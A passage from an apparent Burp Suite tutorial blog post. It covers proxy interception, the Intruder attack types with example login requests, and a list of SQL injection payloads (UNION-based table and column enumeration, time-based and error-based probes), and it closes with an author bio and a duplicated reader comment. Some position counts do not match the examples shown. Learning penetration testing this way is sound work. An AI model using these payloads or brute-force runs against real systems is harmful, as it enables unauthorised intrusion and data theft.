Enable interception: Proxy > Intercept > “Intercept is on”
Actions with intercepted requests:
Modify headers, parameters, or body content
Forward: Send request to server
Drop: Discard request
Action > Send to other Burp tools
Request History
View all requests in Proxy > HTTP History
Filter requests by domain, file type, status code, etc.
Right-click to send to other Burp tools
Match and Replace
Proxy > Options > Match and Replace
Automatically modify requests/responses based on regex patterns
3. Intruder Attack Types
Sniper
Tests each position individually with payloads
Positions: 3, Payloads: 10 = 30 requests
Best for: Testing single vulnerabilities across multiple positions
POST /login HTTP/1.1
Host: example.com
username=§admin§&password=§password§
Battering Ram
Uses same payload in all defined positions simultaneously
Positions: 3, Payloads: 10 = 10 requests
Best for: Testing when same input is needed in multiple fields
POST /login HTTP/1.1
Host: example.com
username=§admin§&password=§admin§
Pitchfork
Uses different payload sets for different positions
Each position gets its corresponding payload
Positions: 3, Payloads per set: 10 = 10 requests
Best for: Testing with related data (username+password pairs)
POST /login HTTP/1.1
Host: example.com
username=§username§&password=§password§
Cluster Bomb
Tests all combinations of payloads
Positions: 3, Payloads per set: 10 = 1,000 requests
Best for: Brute force attacks (username + password combinations)
POST /login HTTP/1.1
Host: example.com
username=§username§&password=§password§
4. Common Payloads for Attacks
SQL Injection Payloads
' OR 1=1 --
' OR '1'='1
' UNION SELECT 1,2,3 --
' UNION SELECT table_name,2,3 FROM information_schema.tables --
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users' --
' AND (SELECT 5151 FROM (SELECT(SLEEP(5)))tImc) --
' AND extractvalue(rand(),concat(0x7e,(SELECT version()),0x7e)) --
I'm passionate about technology, coding. I've been interested in computers since I was a kid. My favorite programming languages are python and JavaScript
You have to work on footer as well as header part to make it more attractive there is lot of space present in header part and find ads sense space at the corner which not make user or website visiter disturb
You have to work on footer as well as header part to make it more attractive there is lot of space present in header part and find ads sense space at the corner which not make user or website visiter disturb